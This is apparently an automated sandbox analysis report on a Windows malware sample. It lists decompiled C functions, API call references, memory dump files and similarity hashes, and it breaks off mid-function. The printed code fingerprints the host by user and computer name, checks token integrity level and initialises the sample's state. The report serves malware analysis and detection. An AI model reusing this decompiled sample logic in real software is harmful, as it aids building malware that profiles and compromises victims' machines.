0x01181356
0x0118135f
0x01181360
0x01181365
0x0118136b
0x01181377
0x01181379
0x01181379
0x01181383
0x01181383
0x01181307
0x01181309
0x01181309
0x0118138d

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,01184EF2,?), ref: 011812F8
GetTickCount.KERNEL32 ref: 0118130C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,01184EF2,?), ref: 01181328
SwitchToThread.KERNEL32(?,00000001,?,?,?,01184EF2,?), ref: 0118132E
_aullrem.NTDLL(?,?,00000009,00000000), ref: 0118134B
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,01184EF2,?), ref: 01181365

Strings

`5a, xrefs: 01181315

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: `5a
API String ID: 507476733-789741898
Opcode ID: 439154bfe9aa9236b49721cd03d536875791a81790a3cf6bb646f2ee7d0a68bc
Instruction ID: 96e8a62065e79b209eb61aa961d79239c1a2660a04671031670bf2f0cf6181ee
Opcode Fuzzy Hash: 439154bfe9aa9236b49721cd03d536875791a81790a3cf6bb646f2ee7d0a68bc
Instruction Fuzzy Hash: 4911E976A44301BFE72C7BA8EC09F5E3B99DB542A1F00C525FD55C62C0EB70D4818BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01189135, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E01189135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x118d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0118A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x118d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x118d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E01187306(_v8 + _v8, _t64);
							}
							HeapFree( *0x118d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x118d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E01187306(_v8 + _v8, _t64);
						}
						HeapFree( *0x118d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x01189135
0x0118913d
0x01189141
0x01189144
0x01189149
0x0118914b
0x01189150
0x01189150
0x01189156
0x01189158
0x01189165
0x011891c6
0x01189167
0x0118916c
0x01189172
0x01189177
0x01189185
0x01189189
0x01189198
0x0118919f
0x011891a6
0x011891a6
0x011891b1
0x011891b1
0x01189189
0x01189177
0x011891c8
0x011891ce
0x011891d8
0x011891da
0x011891df
0x011891ee
0x011891f2
0x011891fd
0x01189204
0x0118920b
0x0118920b
0x01189217
0x01189217
0x011891f2
0x01189222
0x01189224
0x01189227
0x01189229
0x0118922c
0x0118922f
0x01189239
0x0118923d
0x01189241

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 0118916C
RtlAllocateHeap.NTDLL(00000000,?), ref: 01189183
GetUserNameW.ADVAPI32(00000000,?), ref: 01189190
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,01185D20), ref: 011891B1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 011891D8
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 011891EC
GetComputerNameW.KERNEL32(00000000,00000000), ref: 011891F9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,01185D20), ref: 01189217

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 85691907f54833d9a23ff5be3e2f387c697aa360d16c9e5d2bd33b95be7b5afd
Instruction ID: 92c6580b9fa8b5d6aa928c38e77954d9ab3b90cdff8db1c4b1de872b136e1a6b
Opcode Fuzzy Hash: 85691907f54833d9a23ff5be3e2f387c697aa360d16c9e5d2bd33b95be7b5afd
Instruction Fuzzy Hash: 34315071A04209EFDB29EFA8DC80BAEB7F9EF84214F118079E514D7254D730EA419F10

Uniqueness

Uniqueness Score: -1.00%

Function 01181A08, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01181A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x118d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E0118A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0118A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x01181a15
0x01181a1c
0x01181a23
0x01181a37
0x01181a42
0x01181a5a
0x01181a67
0x01181a6a
0x01181a6f
0x01181a7a
0x01181a7e
0x01181a8d
0x01181a91
0x01181aad
0x01181aad
0x01181ab1
0x01181ab1
0x01181ab6
0x01181aba
0x01181ac0
0x01181ac1
0x01181ac8
0x01181ace

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01181A3A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01181A5A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01181A6A
CloseHandle.KERNEL32(00000000), ref: 01181ABA

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01181A8D
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01181A95
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01181AA5

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 67932a838c8b559f15f77dff6be9d4fc6f0fee896f2c4a21b78ffaa2a19b91e9
Instruction ID: d6bfa0614d916c9be628e86bf497f6d9abb8a0290906f63683ec6030acae735b
Opcode Fuzzy Hash: 67932a838c8b559f15f77dff6be9d4fc6f0fee896f2c4a21b78ffaa2a19b91e9
Instruction Fuzzy Hash: A0215C75900249FFEF14EF94DC84EEEBBB9EB04344F108066EA11A6190D7719A46EF60

Uniqueness

Uniqueness Score: -1.00%

Function 01185BA2, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E01185BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E01186C09();
				if(_t21 != 0) {
					_t59 =  *0x118d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x118d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x118d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0118496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x118d2a8; // 0x48aa5a8
					if( *0x118d25c > 5) {
						_t8 = _t26 + 0x118e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x118e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E0118729A(_t27, _t27);
					_t31 = E0118232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x118d270 =  *0x118d270 ^ 0x81bbe65d;
						_t32 = E0118A71F(0x60);
						 *0x118d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x118d32c; // 0x5a395b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x118d32c; // 0x5a395b0
							 *_t51 = 0x118e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x118d238, 0, 0x43);
							 *0x118d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x118d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x118d2a8; // 0x48aa5a8
								_t13 = _t58 + 0x118e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x118c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E01189135( ~_v8 &  *0x118d270,  &E0118D00C); // executed
								_t42 = E0118888E(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E011887AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E011851B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E01181C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x118d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0118A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x01185ba2
0x01185bad
0x01185bb0
0x01185bb3
0x01185bb6
0x01185bbd
0x01185bbf
0x01185bcb
0x01185bcd
0x01185bcd
0x01185bd6
0x01185bdc
0x01185be1
0x01185bfb
0x01185c07
0x01185c09
0x01185c0e
0x01185c18
0x01185c18
0x01185c10
0x01185c10
0x01185c10
0x01185c10
0x01185c1f
0x01185c2c
0x01185c33
0x01185c38
0x01185c38
0x01185c40
0x01185c43
0x01185c69
0x01185c75
0x01185c7a
0x01185c7f
0x01185c81
0x01185cad
0x01185caf
0x01185c83
0x01185c87
0x01185c8c
0x01185c91
0x01185c98
0x01185c9e
0x01185ca3
0x01185ca9
0x01185cb0
0x01185cb2
0x01185cb4
0x01185cc3
0x01185cc9
0x01185cce
0x01185cd0
0x01185d00
0x01185d02
0x01185cd2
0x01185cd2
0x01185cd8
0x01185ce5
0x01185ceb
0x01185ceb
0x01185cf3
0x01185cfc
0x01185d03
0x01185d05
0x01185d07
0x01185d0e
0x01185d1b
0x01185d20
0x01185d25
0x01185d27
0x01185d29
0x00000000
0x00000000
0x01185d2b
0x01185d30
0x01185d32
0x01185d39
0x01185d3d
0x01185d40
0x01185d55
0x01185d59
0x01185d5e
0x00000000
0x01185d5e
0x01185d42
0x01185d44
0x00000000
0x00000000
0x01185d4f
0x01185d51
0x01185d53
0x00000000
0x00000000
0x00000000
0x01185d53
0x01185d36
0x01185d36
0x01185d07
0x01185c45
0x01185c45
0x01185c4a
0x01185d60
0x01185d64
0x01185d6c
0x01185d6c
0x00000000
0x01185d64
0x01185c50
0x01185c53
0x01185c5d
0x01185c64
0x00000000
0x01185d74
0x01185d74
0x01185d78
0x01185d7c
0x01185d7c

APIs

Part of subcall function 01186C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,01185BBB,00000000,00000000), ref: 01186C18

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01185C38

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

memset.NTDLL ref: 01185C87
RtlInitializeCriticalSection.NTDLL(05A39570), ref: 01185C98

Part of subcall function 01181C66: memset.NTDLL ref: 01181C7B
Part of subcall function 01181C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01181CBD
Part of subcall function 01181C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 01181CC8

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01185CC3
wsprintfA.USER32 ref: 01185CF3

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 5ae0b041788fc1e24648d2b4fba3cad47c11f29acb3b32b5464274be47e171a5
Instruction ID: ae9e3c1079d01f513f8a2f8251a91e10db690da3b39c61c33f7ad3ce38b9d771
Opcode Fuzzy Hash: 5ae0b041788fc1e24648d2b4fba3cad47c11f29acb3b32b5464274be47e171a5
Instruction Fuzzy Hash: 4B511271A00318ABDBBDBFE8E848B5E77BAEB04714F44C525E901D7184E7709582CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 011862DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E011862DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E0118A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0118A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E0118A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x118d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x011862e1
0x011862e8
0x011862ed
0x011862f0
0x011862f7
0x011862fa
0x011862fd
0x01186302
0x01186307
0x0118645b
0x0118645d
0x0118645f
0x01186464
0x01186464
0x0118630d
0x01186310
0x01186313
0x01186315
0x01186315
0x01186319
0x00000000
0x00000000
0x0118631d
0x01186349
0x0118634e
0x01186350
0x01186350
0x01186353
0x01186356
0x01186356
0x01186358
0x00000000
0x01186323
0x01186325
0x01186344
0x01186344
0x0118635b
0x0118635b
0x0118635c
0x0118635c
0x0118635f
0x00000000
0x00000000
0x00000000
0x0118635f
0x01186329
0x01186370
0x01186374
0x0118644e
0x01186450
0x01186450
0x01186451
0x01186454
0x00000000
0x01186454
0x0118637d
0x0118638e
0x01186392
0x0118644a
0x00000000
0x0118644a
0x01186398
0x0118639b
0x0118639f
0x011863a3
0x011863a8
0x01186440
0x01186440
0x00000000
0x01186446
0x011863b3
0x011863bc
0x011863d0
0x011863d7
0x011863ec
0x011863f2
0x011863fa
0x00000000
0x00000000
0x00000000
0x00000000
0x011863fc
0x011863fc
0x011863fc
0x01186403
0x0118640b
0x00000000
0x00000000
0x0118640d
0x01186416
0x00000000
0x00000000
0x00000000
0x01186418
0x0118641a
0x0118641d
0x0118641d
0x01186420
0x01186424
0x01186427
0x0118642d
0x01186430
0x01186437
0x00000000
0x011863b3
0x0118632e
0x01186336
0x0118633c
0x0118633e
0x0118633e
0x01186341
0x01186343
0x00000000
0x01186343
0x0118631d
0x01186363
0x01186368
0x0118636a
0x0118636a
0x0118636d
0x0118636d
0x00000000

APIs

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

lstrcpy.KERNEL32(63699BC4,00000020), ref: 011863D7
lstrcat.KERNEL32(63699BC4,00000020), ref: 011863EC
lstrcmp.KERNEL32(00000000,63699BC4), ref: 01186403
lstrlen.KERNEL32(63699BC4), ref: 01186427

Strings

, xrefs: 01186370

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 886b7c0dff689ab50d17a05f5452fa4fe8513b676bff138834bffacf38310b6b
Instruction ID: af47823dcf5c6c5a350514e68e50cae7330c0721d43eae4133ff192ad8d2348e
Opcode Fuzzy Hash: 886b7c0dff689ab50d17a05f5452fa4fe8513b676bff138834bffacf38310b6b
Instruction Fuzzy Hash: 5151BB75A04208EBDF29EF9DC4847ADBBB6FF41314F15C06AE919AB201C771AA41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01183AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 01183B0D
SysAllocString.OLEAUT32(011885ED), ref: 01183B51
SysFreeString.OLEAUT32(00000000), ref: 01183B65
SysFreeString.OLEAUT32(00000000), ref: 01183B73

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f5dc5dd436bbc1b2e858ae4c90be8f75a626b6a016a0e505b5fd3cd91d6e9c19
Instruction ID: bca6536a4578c1a4fb0fa67d38eff7838e07288b1484defd76d52b61e66b3225
Opcode Fuzzy Hash: f5dc5dd436bbc1b2e858ae4c90be8f75a626b6a016a0e505b5fd3cd91d6e9c19
Instruction Fuzzy Hash: E9314EB5910209EFCB09DF98D8C09AE7BB9FF08750B24842EFA1697250D730DA81CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0118486F, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0118486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E0118A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x118c284); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x118c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x0118487a
0x0118487e
0x01184880
0x01184881
0x01184889
0x01184889
0x0118488d
0x00000000
0x00000000
0x01184884
0x01184885
0x01184888
0x01184888
0x01184895
0x0118489a
0x011848a0
0x011848a8
0x011848ae
0x011848b0
0x011848b5
0x011848b9
0x011848bb
0x011848be
0x011848c5
0x011848c5
0x011848cf
0x011848d2
0x011848d3
0x011848d5
0x011848e1
0x011848e1
0x011848ee

APIs

StrChrA.SHLWAPI(?,00000020,00000000,05A395AC,?,01185D25,?,0118243F,05A395AC,?,01185D25), ref: 01184889
StrTrimA.KERNELBASE(?,0118C284,00000002,?,01185D25,?,0118243F,05A395AC,?,01185D25), ref: 011848A8
StrChrA.SHLWAPI(?,00000020,?,01185D25,?,0118243F,05A395AC,?,01185D25), ref: 011848B3
StrTrimA.SHLWAPI(00000001,0118C284,?,01185D25,?,0118243F,05A395AC,?,01185D25), ref: 011848C5

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: fce2f2d4de5b001a9dd74fc104f367441ba1f71fbee037571fa6d543087926bc
Instruction ID: f46d4b6f21e02aeb26c6062fcfa0cbacab8b1936f3a9cdc9f09b062c006513fc
Opcode Fuzzy Hash: fce2f2d4de5b001a9dd74fc104f367441ba1f71fbee037571fa6d543087926bc
Instruction Fuzzy Hash: 0D01B5716057529FD239AEA99C48F2BBF98EF46A94F118519F942D7380DF60C801CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 01188D14, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01188D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0118A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x118d2a8; // 0x48aa5a8
				_t4 = _t24 + 0x118edc0; // 0x5a39368
				_t5 = _t24 + 0x118ed68; // 0x4f0053
				_t26 = E01185356( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x118d2a8; // 0x48aa5a8
						_t11 = _t32 + 0x118edb4; // 0x5a3935c
						_t48 = _t11;
						_t12 = _t32 + 0x118ed68; // 0x4f0053
						_t52 = E011845C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x118d2a8; // 0x48aa5a8
							_t13 = _t35 + 0x118edfe; // 0x30314549
							_t37 = E01188E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x118d25c - 6;
								if( *0x118d25c <= 6) {
									_t42 =  *0x118d2a8; // 0x48aa5a8
									_t15 = _t42 + 0x118ec0a; // 0x52384549
									E01188E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x118d2a8; // 0x48aa5a8
							_t17 = _t38 + 0x118edf8; // 0x5a393a0
							_t18 = _t38 + 0x118edd0; // 0x680043
							_t45 = E01185D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x118d238, 0, _t52);
						}
					}
					HeapFree( *0x118d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E01184F14(_t54);
				}
				return _t45;
			}

0x01188d14
0x01188d24
0x01188d27
0x01188d2e
0x01188d30
0x01188d30
0x01188d33
0x01188d38
0x01188d3f
0x01188d4c
0x01188d51
0x01188d55
0x01188d63
